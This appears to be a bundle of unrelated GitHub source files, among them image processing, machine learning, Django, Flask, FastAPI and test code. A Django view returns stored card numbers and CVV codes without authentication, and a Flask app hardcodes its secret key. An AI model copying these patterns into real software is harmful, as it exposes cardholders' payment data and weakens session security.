entry.name+\".channel_2.tiff\")\n\n print(\"Separating channels...\")\n output = subprocess.check_output([\"convert\", uncorrected_image_path, \"-depth\", \"16\",\n \"-channel\", \"RGB\", \"-separate\", channelpath])\n print(\"Processing red...\")\n output = subprocess.check_output([\"mogrify\", \"-filter\", \"lanczos\", \"-depth\",\n \"16\", \"-distort\", \"barrel\", red, redpath])\n if n == 2:\n print(\"Processing green...\")\n output = subprocess.check_output([\"mogrify\", \"-filter\", \"lanczos\", \"-depth\",\n \"16\", \"-distort\", \"barrel\", green, greenpath])\n else:\n print(\"Skipping green as CA correction only\")\n print(\"Processing blue...\")\n output = subprocess.check_output([\"mogrify\", \"-filter\", \"lanczos\", \"-depth\",\n \"16\", \"-distort\", \"barrel\", blue, bluepath])\n print(\"Merging channels...\")\n output = subprocess.check_output([\"convert\", \"-depth\", \"16\",\n redpath, greenpath, bluepath, \"-combine\", corrected_image_path])\n print(\"Removing temporary channel files...\")\n os.remove(redpath)\n os.remove(greenpath)\n os.remove(bluepath)\n\n if n == 0:\n image_to_analyse = uncorrected_image_path\n\n elif n >= 1:\n image_to_analyse = corrected_image_path\n else:\n raise Exception()\n\n print(\"Running mtf_mapper for loop {}...\".format(n+1))\n print(\"Analysing file '{}'...\".format(image_to_analyse))\n\n output = subprocess.check_output([\"mtf_mapper\", \"-a\", \"-q\", \"-l\", \"--nosmoothing\", \"-e\", image_to_analyse, WORKING_DIR])\n\n print(\"MTF Mapper output\", output)\n\n temp_mtf_output_path = os.path.join(WORKING_DIR, \"edge_sfr_values.txt\")\n temp_esf_output_path = os.path.join(WORKING_DIR, \"raw_esf_values.txt\")\n\n if n == 0:\n destination_txt_path = new_txtfilepath\n destination_esf_path = new_esf_filepath\n output = subprocess.check_output([\"convert\", uncorrected_image_path, uncorrected_image_path + \".jpg\"])\n elif n == 1:\n destination_txt_path = new_txtfilepath_ca\n destination_esf_path = new_esf_filepath_ca\n output = subprocess.check_output([\"convert\", corrected_image_path, corrected_image_path + \".ca_only.jpg\"])\n elif n == 2:\n destination_txt_path = new_txtfilepath_fullcorr\n destination_esf_path = new_esf_filepath_fullcorr\n output = subprocess.check_output([\"convert\", corrected_image_path, corrected_image_path + \".full.jpg\"])\n else:\n raise Exception()\n\n print(\"Moving {} -> {}\".format(temp_mtf_output_path, destination_txt_path))\n print(\"Moving {} -> {}\".format(temp_esf_output_path, destination_esf_path))\n try:\n os.remove(destination_txt_path)\n except FileNotFoundError:\n pass\n try:\n os.remove(destination_esf_path)\n except FileNotFoundError:\n pass\n shutil.move(temp_mtf_output_path, destination_txt_path)\n shutil.move(temp_esf_output_path, destination_esf_path)\n print()\n\n os.remove(linked_raw_path)\n print(\"Removing temporary file {}\".format(uncorrected_image_path))\n os.remove(uncorrected_image_path)\n if caed or distorted:\n print(\"Removing temporary file {}\".format(corrected_image_path))\n os.remove(corrected_image_path)\n print()\n\n\n # output = subprocess.check_output([\"convert\", uncorrected_image_path, \"-depth\", \"8\", \"-filter\", \"lanczos\",\n # \"-write\", \"MPR:orig\", \"+delete\",\n # \"(\", \"MPR:orig\", \"-separate\", \"-delete\", \"1,2\", \"-distort\", \"barrel\", red, \")\",\n # \"(\", \"MPR:orig\", \"-separate\", \"-delete\", \"1,2\", \"-distort\", \"barrel\", green, \")\",\n # \"(\", \"MPR:orig\", \"-separate\", \"-delete\", \"1,2\", \"-distort\", \"barrel\", blue, \")\",\n # \"-combine\", corrected_image_path])\n\n","repo_name":"tealtortoise/lentil","sub_path":"processrafs.py","file_name":"processrafs.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"5866112120","text":"import os\nimport re\nimport common.util as u\nimport numpy as np\nfrom collections import deque\n#print(os.getcwd())\n\n\ndef increase(a, v=1):\n for row in range(len(a)):\n for col in range(len(a[row])):\n if a[row,col] >= 0:\n a[row,col] +=1\n return a\n\ndef flash(g):\n rtn = False\n for row in range(len(a)):\n if row == 0:\n t=0\n b=2\n elif row == len(a)-1:\n t=1\n b=1\n else:\n t=1\n b=2\n \n\n for col in range(len(a[row])):\n if col == 0:\n l = 0\n r = 2\n elif col == len(a[row])-1: \n l = 1\n r = 1\n else:\n l = 1\n r = 2\n\n if g[row,col] > 9:\n local = g[(row-t):(row+b), (col-l):(col+r)]\n increase(local)\n g[row,col] = -1\n rtn = True\n\n return rtn\n\ndef reset(a,counter):\n round_counter = 0\n for row in range(len(a)):\n for col in range(len(data[row])):\n if a[row,col] == -1:\n a[row,col] = 0\n round_counter+=1\n counter+=round_counter\n return a,counter,round_counter\n\nif __name__ == \"__main__\":\n data = u.readfile(u.AOC_2021 + \"\\\\11\\\\input.txt\",Integer=False)\n\n for i in range(len(data)):\n t = []\n for j in range(len(data[i])):\n t.append(int(data[i][j]))\n data[i] = t\n a = np.array(data)\n # f = a.copy()\n # f.fill(1)\n # print(f) \n counter = 0\n print(a)\n for s in range(1000):\n #print(s)\n #step 1\n increase(a)\n #print(a)\n #step 2\n while flash(a): pass\n #print(a)\n #step 3\n a, counter,rc = reset(a,counter)\n if rc == 100:\n print(\"sync round: {}\".format(s+1))\n break\n print(a)\n print(counter)\n #print(\" X \")\n #print(a[r][c])\n # if a[(row-t):(row+b), (col-l):(col+r)].min() == a[row,col]:\n # print(a[row,col])\n # risk+= a[row,col]+1\n # low_points.append([row,col])","repo_name":"schroeder719/AdventOfCode","sub_path":"2021/11/11a.py","file_name":"11a.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7622633786","text":"import json\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import JsonResponse, HttpResponse, HttpRequest\nfrom django.views import View\n\nfrom .models import Card\n\n\nclass CardView(View):\n def get(self, request):\n card_number = request.GET.get('card_number', None)\n if card_number:\n try:\n card = Card.objects.get(card_number=card_number)\n data = {\n 'id': str(card.id),\n 'card_number': card.card_number,\n 'expiry_date': card.expiry_date,\n 'cvv_code': card.cvv_code,\n 'issue_date': card.issue_date.strftime('%Y-%m-%d'),\n 'owner_id': str(card.owner_id),\n 'card_status': card.card_status\n }\n return JsonResponse(data)\n except ObjectDoesNotExist:\n return JsonResponse({'error': 'Card not found'}, status=404)\n else:\n return JsonResponse({'error': 'Please provide a card number.'}, status=400)\n\n def post(self, request: HttpRequest):\n # Parse the JSON data from the request body\n data = json.loads(request.body)\n\n # Create a new card object with the provided data\n card = Card(\n card_number=data['card_number'],\n expiry_date=data['expiry_date'],\n cvv_code=data['cvv_code'],\n issue_date=data['issue_date'],\n owner_id=data['owner_id'],\n card_status=data['card_status']\n )\n\n # Check if the card number is valid\n if not card.is_valid():\n return JsonResponse({'error': 'Invalid card number.'}, status=400)\n\n # Save the card object to the database\n card.save()\n\n # Return a success message\n response_data = {'message': 'Card created successfully'}\n return JsonResponse(response_data)\n","repo_name":"H0aqin/Abobaa","sub_path":"django/cards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9975770470","text":"import numpy as np\nfrom code.metrics import accuracy, MAE\n\n\"\"\"\n # There are functions where we separate and process our data. \n \n train_test_split : It allows us to divide our data according to the desired ratio.\n parameters : \n X : data feature,\n y : data class,\n rate : percentage of data split, default=0.8\n \n \n return : X_train, X_test, y_train, y_test\n \n stratified_train_test_split : It allows us to divide our data classes according to their types. \n It adds from each of our data classes in the train and test sections. \n parameters :\n X : data feature,\n y : data class, \n rate : percentage of data split \n \n return : X_train, X_test, y_train, y_test\n \n cross_val_score : It divides our data into k folds and allows each fold to be used as test data. \n parameters : \n model : machine learning model,\n X : data feature, \n y : data class,\n k_split : number of folds, default = 5, \n scoring : accuracy technique, default='accuracy',\n stratify : puts each class value in each fold, default=False\n \n return : accuracy value for each fold \n\n\"\"\"\n\ndef train_test_split(X, y, rate=0.8):\n idx = X.index.values.copy()\n np.random.seed(31) \n np.random.shuffle(idx) # shuffle to avoid data similarities \n X, y = np.asarray(X.loc[idx]), np.asarray(y.loc[idx]) \n \n point = int(len(X) * 0.8) # divide data by desired ratio \n \n return X[:point], X[point:], y[:point], y[point:]\n\ndef stratified_train_test_split(X, y, rate=0.8): \n train_idx = np.zeros((0,), dtype=int)\n test_idx = np.zeros((0,), dtype=int)\n \n labels = y.unique() # save all labels types in data \n for label in labels:\n idx = y[y == label].index.values.copy() # find all index of specific label \n np.random.seed(31) \n np.random.shuffle(idx) # shuffle to avoid data similarities \n train_idx = np.concatenate((train_idx, idx[:int(len(idx) * rate)]), axis=0) # separate data into test and train \n test_idx = np.concatenate((test_idx, idx[int(len(idx) * rate):]), axis=0)\n \n X, y = np.asarray(X), np.asarray(y)\n return X[train_idx], X[test_idx], y[train_idx], y[test_idx]\n\n\ndef cross_val_score(model, X, y, k_split = 5, stratify=False, scoring='accuracy'): \n if stratify: # If we want each label to be in each fold \n labels = y.unique()\n folds_idx = [list() for i in range(k_split)]\n index = 0\n for label in labels:\n idx = y[y == label].index.values.copy()\n np.random.seed(31)\n np.random.shuffle(idx)\n for j in idx:\n folds_idx[index].append(j)\n index += 1\n if index == len(folds_idx):\n index = 0 \n \n else: # divide our data by the desired number \n idx = X.index.values.copy()\n np.random.seed(31) \n np.random.shuffle(idx)\n folds_idx = np.split(idx, k_split) \n \n scores = list() \n for i in range(k_split):\n tmp = folds_idx.copy()\n test_ind = tmp.pop(i)\n train_ind = [ _ for sub in tmp for _ in sub]\n X_train, X_test, y_train, y_test = np.asarray(X.iloc[train_ind]), np.asarray(X.iloc[test_ind]), np.asarray(y[train_ind]), np.asarray(y[test_ind])\n model.fit_transform(X_train, y_train, X_test)# gives data to the model \n y_pred = model.predict(X_test) # output for test data by the model \n \n if scoring == 'accuracy':\n score = accuracy(y_test, y_pred)\n \n elif scoring == 'MAE':\n score = MAE(y_test, y_pred)\n \n scores.append(score) # saves the accuracy result for each fold \n \n scores = np.asarray(scores) \n scores = np.append(scores, [scores.min(), scores.mean(), scores.max()])\n return scores","repo_name":"MuratCelik3506/Hacettepe_University_First_2_Year","sub_path":"5_term/Assignment1_ K-Nearest_Neighbor/code/model_selection.py","file_name":"model_selection.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2207475317","text":"# encoding: utf-8\n\"\"\"\n@author: monitor1379\n@contact: yy4f5da2@hotmail.com\n\n@version: 1.0\n@file: models.py\n@time: 18-3-14 上午12:05\n\n这一行开始写关于本文件的说明与解释\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom word2vec.loader import Corpus\n\n\ndef lookup_row(table, row):\n return table[row: row + 1, :]\n\n\ndef set_row(table, row, value):\n table[row: row + 1, :] = value\n\n\ndef lookup_col(table, col):\n return table[:, col: col + 1]\n\n\ndef softmax(logits):\n shift_logits = logits - np.max(logits)\n exp_shift_logits = np.exp(shift_logits)\n return exp_shift_logits / np.sum(exp_shift_logits)\n\n\ndef sigmoid(z):\n if z > 6:\n return np.array([[1.0]])\n elif z < -6:\n return np.array([[0.0]])\n else:\n return 1 / (1 + np.exp(-z))\n\n\ndef sampling(data):\n return data[np.random.randint(len(data))]\n\n\nclass SkipGram(object):\n\n def __init__(self, sentences, word2id, id2word, words_len):\n self.sentences = sentences\n self.word2id = word2id\n self.id2word = id2word\n self.words_len = words_len\n self.words_list = list(word2id.keys())\n\n self.feature_dim = 0\n self.word_vec = None\n\n self.w0 = None\n self.w1 = None\n\n self.logger = {}\n\n def _train_one_step(self, target_word, another_word, label, lr):\n w0 = self.w0\n w1 = self.w1\n x_id = self.word2id[target_word]\n y_id = self.word2id[another_word]\n # TODO(monitor1379): 增加negative sampling\n # 前向计算\n logits = lookup_row(w0, x_id).dot(lookup_col(w1, y_id))\n output = sigmoid(logits)\n loss = np.abs(label - output[0][0])\n print(label, output[0][0])\n self.logger['loss'].append(loss)\n\n # 反向传播\n d_logit = (label - output) * output * (1 - output) # TODO(monitor1379): fix\n d_w1 = lookup_row(w0, x_id).T.dot(d_logit)\n d_w0 = d_logit.dot(lookup_col(w1, y_id).T)\n\n # 更新模型\n self.w1[:, y_id] += d_w1[:, 0] * lr\n self.w0[x_id, :] += d_w0[0, :] * lr\n\n def train(self, feature_dim, context_window_size, n_epochs, lr):\n self.logger['loss'] = []\n self.w0 = np.random.uniform(low=-0.5 / feature_dim, high=0.5 / feature_dim, size=[self.words_len, feature_dim])\n self.w1 = np.random.uniform(low=-0.5 / feature_dim, high=0.5 / feature_dim, size=[feature_dim, self.words_len])\n random_negative_sampling_times = 3\n\n for epoch in range(1, n_epochs + 1):\n print('{:0>3}/{}'.format(epoch, n_epochs))\n for sentence in self.sentences: # 对于每句话\n for target_word_index, target_word in enumerate(sentence): # 对于每个中心词\n window_start = max(target_word_index - context_window_size, 0)\n window_end = min(target_word_index + context_window_size + 1, len(sentence))\n\n for context_word_index in range(window_start, window_end): # 对于每个上下文窗口中的词\n context_word = sentence[context_word_index]\n self._train_one_step(target_word, context_word, label=1, lr=lr)\n for i in range(random_negative_sampling_times):\n self._train_one_step(target_word, sampling(self.words_list), label=0, lr=lr)\n\n plt.ylim([0, 1])\n plt.plot(self.logger['loss'])\n plt.show()\n # ***********************************************\n # TODO(monitor1379): Softmax + CrossEntropy\n # ***********************************************\n # logits = x.dot(w1)\n # output = softmax(logits)\n # loss = np.abs(1 - lookup_col(output, y_id))\n # print(lookup_col(output, y_id))\n # print(w0)\n # 反向传播,损失函数是cross entropy\n # d_logit = lookup_col(output, y_id) - 1\n # d_x = d_logit.dot(lookup_col(w1, y_id).T)\n # d_w1 = x.T.dot(d_logit)\n # w0[x_id] += d_x[0, :] * lr\n # w1[:, y_id] += d_w1[:, 0] * lr\n\n def find_nearest(self, word):\n pass\n\n def save_model(self, path):\n pass\n\n def load_model(self, path):\n pass\n\n\ndef run():\n corpus = Corpus()\n corpus.load_monitor1379_data('../data/monitor1379-data-100.txt')\n model = SkipGram(corpus.sentences, corpus.word2id, corpus.id2word, corpus.words_len)\n model.train(feature_dim=150, context_window_size=4, n_epochs=100, lr=0.01)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"monitor1379/NaiveWord2Vector","sub_path":"word2vec/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"983614092","text":"import pandas as pd\r\nimport argparse\r\n\r\n\r\nparser = argparse.ArgumentParser(description=\"Retrieving the manufacturer's exon and transcript information\")\r\nparser.add_argument('input', metavar='input', type=str, nargs=1, help=\"The name of the information file\")\r\nparser.add_argument('output', metavar='output', type=str, nargs=1, help=\"The name of the output file\")\r\nargs=parser.parse_args()\r\n\r\n\r\ndef main(argv):\r\n input1=argv.input[0]\r\n output=argv.output[0]\r\n with open(input1,\"r\") as file:\r\n with open(output,\"w\") as outfile:\r\n for line in file: \r\n if line[1]!=\"J\" and line[1]!=\"P\":\r\n continue \r\n line=line.split(\",\")\r\n PSR=line[0].strip('\\\"')\r\n Strand=line[2].strip('\\\"')\r\n TC=line[6].strip('\\\"')\r\n TC=TC.split(\"///\")\r\n TCs=list(set(TC))\r\n Tc=TC[0]\r\n E=line[8].strip('\\\"')\r\n TR=line[14].strip('\\\"')\r\n Trstemp=TR.split(\"///\")\r\n Trs=list(Trstemp)\r\n for tr in range(len(Trs)):\r\n if \"to\" in E:\r\n #print(tr)\r\n Estemp=E.split(\"///\")\r\n Es=list(Estemp)\r\n #print(Es)\r\n #for e in Es:\r\n #junction: write lines for each with association next to it\r\n Ese=Es[tr].split(\"_\")\r\n row1=[Tc,PSR,Ese[0].strip('\\\"'),3,Trs[tr].strip('\\\"'),Strand]\r\n outfile.write(\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n\".format(row1[0].split('.')[0],row1[1].split('.')[0],row1[2].split('.')[0],row1[3],row1[4].split('.')[0],row1[5])) \r\n row2=[Tc,PSR,Ese[2].strip('\\\"'),5,Trs[tr].strip('\\\"'),Strand]\r\n outfile.write(\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n\".format(row2[0].split('.')[0],row2[1].split('.')[0],row2[2].split('.')[0],row2[3],row2[4].split('.')[0],row2[5])) \r\n else:\r\n Estemp=E.split(\"///\")\r\n Es=list(Estemp)\r\n e=Es[tr]\r\n row=[Tc,PSR,e.strip('\\\"'),\"\",Trs[tr].strip('\\\"'),Strand]\r\n outfile.write(\"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\\n\".format(row[0].split('.')[0],row[1].split('.')[0],row[2].split('.')[0],row[3],row[4].split('.')[0],row[5])) \r\n outfile.close()\r\n file.close() \r\n ExonAnnot=pd.read_table(output,header=None)\r\n ExonAnnot=ExonAnnot.sort_values(by=[0,1])\r\n ExonAnnot.to_csv(output,sep=\"\\t\",header=False,index=False)\r\n\t\r\n with open(output,\"r\") as file1:\r\n with open(\"LineIndexing_EAnnot_TrAnnot.txt\",\"w\") as outfile1:\r\n line=file1.readline()\r\n line=line.split(\"\\t\")\r\n TC=line[0]\r\n begin=1\r\n linenr=1\r\n length=1\r\n for line in file1:\r\n line=line.split(\"\\t\")\r\n linenr+=1\r\n TCtemp=line[0]\r\n if TC==TCtemp:\r\n length+=1\r\n else:\r\n row=[TC.split('.')[0],begin,length]\r\n outfile1.write(\"{0}\\t{1}\\t{2}\\n\".format(row[0],row[1],row[2]))\r\n begin=linenr\r\n length=1\r\n TC=TCtemp\r\n row=[TC.split('.')[0],begin,length] \r\n outfile1.write(\"{0}\\t{1}\\t{2}\\n\".format(row[0],row[1],row[2]))\r\n outfile1.close() \r\n file1.close()\r\n\r\nif __name__ == \"__main__\":\r\n main(args) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"cran/REIDS","sub_path":"inst/doc/ExonAndTranscriptAnnotations.py","file_name":"ExonAndTranscriptAnnotations.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23698369691","text":"import logging\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom django_celery_beat.models import IntervalSchedule, \\\n CrontabSchedule, PeriodicTask\n\nfrom reporting.tasks import create_reports_for_today\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n help = 'Setup celery beat periodic tasks'\n\n @transaction.atomic\n def handle(self, *args, **options):\n logger.debug('Deleting all periodic tasks and schedules...')\n\n IntervalSchedule.objects.all().delete()\n CrontabSchedule.objects.all().delete()\n PeriodicTask.objects.all().delete()\n\n periodic_tasks_data = [\n {\n 'task': create_reports_for_today,\n 'name': 'Create reports for today.',\n 'cron': {\n 'minute': 59,\n 'hour': 23\n },\n 'enabled': True\n }\n ]\n\n for period_task in periodic_tasks_data:\n logger.debug(f'Setting up {period_task[\"task\"].name}')\n\n cron = CrontabSchedule.objects.create(\n **period_task['cron']\n )\n\n PeriodicTask.objects.create(\n name=period_task['name'],\n task=period_task['task'].name,\n crontab=cron,\n enabled=period_task['enabled']\n )\n","repo_name":"akhundMurad/shop","sub_path":"src/tasks/management/commands/setupperiodictasks.py","file_name":"setupperiodictasks.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"1494114222","text":"#Finding an drawing contours\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\ndef main():\r\n \r\n location = \"C:\\\\Users\\\\Purneswar Prasad\\\\Documents\\\\misc\\\\\"\r\n imgpath = location + \"4.2.07.tiff\"\r\n img = cv2.imread(imgpath, 1)\r\n \r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n \r\n grayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n \r\n ret, thresh = cv2.threshold(grayscale_img, 127, 255, 0) #Change thresh value for different outputs\r\n \r\n contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n #In the video, it uses a img2 variable which is not required in higher versions of OpenCV\r\n \r\n cv2.drawContours(img, contours, -1, (0, 0, 255), 2)\r\n \r\n original = cv2.imread(imgpath, 1)\r\n \r\n original = cv2.cvtColor(original, cv2.COLOR_BGR2RGB)\r\n \r\n output = [original, img]\r\n titles = [\"Original Image\", \"Contours\"]\r\n \r\n for i in range(2):\r\n plt.subplot(1, 2, i+1)\r\n plt.imshow(output[i])\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n \r\n plt.show()\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n ","repo_name":"PurneswarPrasad/Image-Processing-project","sub_path":"saveIP48.py","file_name":"saveIP48.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40724019811","text":"from typing import Union\r\n\r\nfrom fastapi import Body, FastAPI\r\nfrom pydantic import BaseModel, Field\r\n\r\napp = FastAPI()\r\n\r\n\r\nclass Item(BaseModel):\r\n name: str\r\n description: Union[str, None] = Field(\r\n default=None, title=\"The description of the item\", max_length=300\r\n )\r\n price: float = Field(gt=0, description=\"The price must be greater than zero\")\r\n is_offer: Union[bool, None] = None\r\n\r\n\r\n@app.get(\"/\")\r\ndef read_root():\r\n return {\"Hello\": \"World\"}\r\n\r\n\r\n@app.get(\"/items/{item_id}\")\r\ndef read_item(item_id: int, q: Union[str, None] = None):\r\n return {\"item_id\": item_id, \"q\": q}\r\n\r\n\r\n@app.put(\"/items/{item_id}\")\r\ndef update_item(item_id: int, item: Item = Body(embed=True)):\r\n results = {\"item_id\": item_id, \"item\": item}\r\n return results","repo_name":"EneruJ/H3PyDocker","sub_path":"APIDocker/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18451048557","text":"import sys,os\nfrom os import environ as env\nfrom flask import Flask, redirect, jsonify,session,url_for,render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom authlib.integrations.flask_client import OAuth\nfrom six.moves.urllib.parse import urlencode\n\nfrom info import *\n\napp = Flask(__name__)\napp.secret_key = \"something\"\n# app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\napp.config['SQLALCHEMY_DATABASE_URI'] = env.get('DATABASE_URL')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\noauth = OAuth(app)\n\nAUTH0_BASE_URL='https://'+ env.get('AUTH0_DOMAIN')\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH, POST, DELETE, OPTIONS')\n return response\n\nauth0 = oauth.register(\n 'auth0',\n client_id = env.get('AUTH0_CLIENT_ID'),\n client_secret = env.get('AUTH0_CLIENT_SECRET'),\n api_base_url = AUTH0_BASE_URL,\n access_token_url =AUTH0_BASE_URL + '/oauth/token',\n authorize_url = AUTH0_BASE_URL + '/authorize',\n client_kwargs={\n 'scope': 'openid profile email',\n },\n)\n\nfrom models.Ticket import Ticket\nfrom models.Users import Users\nfrom models.Map_users_proj import Map_users_proj\nfrom models.Project import Project\nfrom models.Ticket_history import Ticket_history\nfrom models.Notification import Notification\nfrom models.Comment import Comment\nfrom models.MonthConfig import MonthConfig\n\nfrom controllers import userController, developer,ticket,comment,project,Admin,manager,notification\n\n@app.route('/')\ndef login():\n return auth0.authorize_redirect(redirect_uri=env.get('AUTH0_CALLBACK_URL'), audience=env.get('AUTH0_AUDIENCE'))\n\n@app.route('/callback')\ndef callback_handling():\n auth0.authorize_access_token()\n resp = auth0.get('userinfo')\n userinfo = resp.json()\n users = Users.query.filter_by(users_email=userinfo['email']).first()\n users = users.format()\n session['userProfile'] = {\n 'email': userinfo['email'],\n 'role': users['role'],\n 'name':userinfo['nickname'],\n 'id':users['id']\n }\n if(users['role'] == \"admin\"):\n return redirect('/'+ users['role']+ '/users')\n if users['role'] == \"manager\":\n return redirect('/'+ users['role']+ '/dashboard')\n return redirect('/'+ users['role']+ '/tickets')\n\n@app.route('/logout')\ndef logout():\n session.clear()\n params = {'returnTo': url_for('login', _external=True), 'client_id': env.get('AUTH0_CLIENT_ID')}\n return redirect(auth0.api_base_url + '/v2/logout?' + urlencode(params))\n\n\n@app.errorhandler(404)\ndef error_404(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '404',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(422)\ndef error_404(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '422',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(500)\ndef error_500(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '500',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(401)\ndef error_401(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '401',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\n@app.errorhandler(403)\ndef error_403(error):\n userInfo = session.get('userProfile', 'not set')\n data = {\n 'user_name': userInfo['name'],\n 'role': userInfo['role'],\n 'page' : 'error',\n 'error' : '403',\n 'message': error,\n 'notify': notification.notify(userInfo['id']),\n }\n return render_template('error.html',data=data)\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"rohangandhi109/bugTracker","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"14692230769","text":"class Solution(object):\n def numTrees(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n \n ref = [0 for _ in range(n+1)]\n ref[0] = ref[1] = 1\n \n if n < 2: return 1\n \n for i in range(2, n+1):\n for j in range(1, i+1):\n ref[i] += ref[j-1]*ref[i-j]\n \n return ref[n]","repo_name":"mavelyc/leetcode-practice","sub_path":"python/unique-BST.py","file_name":"unique-BST.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9254592060","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom utils.core_test_case import CoreTestCase\n\n\nclass TestProductSticker(CoreTestCase):\n def test_product_sticker(self, driver):\n driver.get(\"http://localhost/litecart/en/\")\n WebDriverWait(driver, 10).until(EC.title_is(\"Online Store | My Store\"))\n\n products = driver.find_elements(By.CSS_SELECTOR, \".content .box .product\")\n\n for product in products:\n stickers = product.find_elements(By.CLASS_NAME, \"sticker\")\n if len(stickers) == 0:\n print(f\"Product {product.find_element(By.CLASS_NAME, 'name').text} doesn't have a sticker.\")\n elif len(stickers) > 1:\n print(f\"Product {product.find_element(By.CLASS_NAME, 'name').text} has {len(stickers)} stickers!\")\n","repo_name":"miowch/Selenium_Course","sub_path":"tests/test_product_sticker.py","file_name":"test_product_sticker.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20952420207","text":"# # Native # #\nimport asyncio\nfrom typing import AsyncGenerator\n\n# # Installed # #\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.asyncio import async_scoped_session\n# from sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlmodel.ext.asyncio.session import AsyncSession\n\n# # Package # #\nfrom core.database.database import async_engine\n\n__all__ = (\n \"get_session\"\n)\n\n\nasync_session_factory = sessionmaker(\n bind=async_engine,\n expire_on_commit=False,\n class_=AsyncSession,\n autocommit=False,\n autoflush=False\n)\n\n# passing a lambda function to async_scoped_session that returns the ID of the current asyncio task as the session scope.\n# This ensures that each session is associated with a unique task and gets its own connection.\nasync_session_factory = async_scoped_session(\n async_session_factory, scopefunc=lambda: id(asyncio.current_task()))\n\n\nasync def get_session() -> AsyncGenerator[AsyncSession, None]:\n async with async_session_factory() as session:\n try:\n yield session\n await session.commit()\n except Exception:\n await session.rollback()\n raise\n finally:\n await session.close()\n\n\n# async def get_session_with_bind() -> AsyncGenerator[AsyncSession, None]:\n# async with async_session_factory(bind=async_engine) as session:\n# yield session\n\n\n# async def get_session_with_bind_and_autocommit() -> AsyncGenerator[AsyncSession, None]:\n# async with async_session_factory(bind=async_engine, autocommit=True) as session:\n# yield session\n\n\n# async def get_session_with_bind_and_autoflush() -> AsyncGenerator[AsyncSession, None]:\n# async with async_session_factory(bind=async_engine, autoflush=True) as session:\n# yield session\n\n\n# async def get_session_with_bind_and_autocommit_and_autoflush() -> AsyncGenerator[AsyncSession, None]:\n# async with 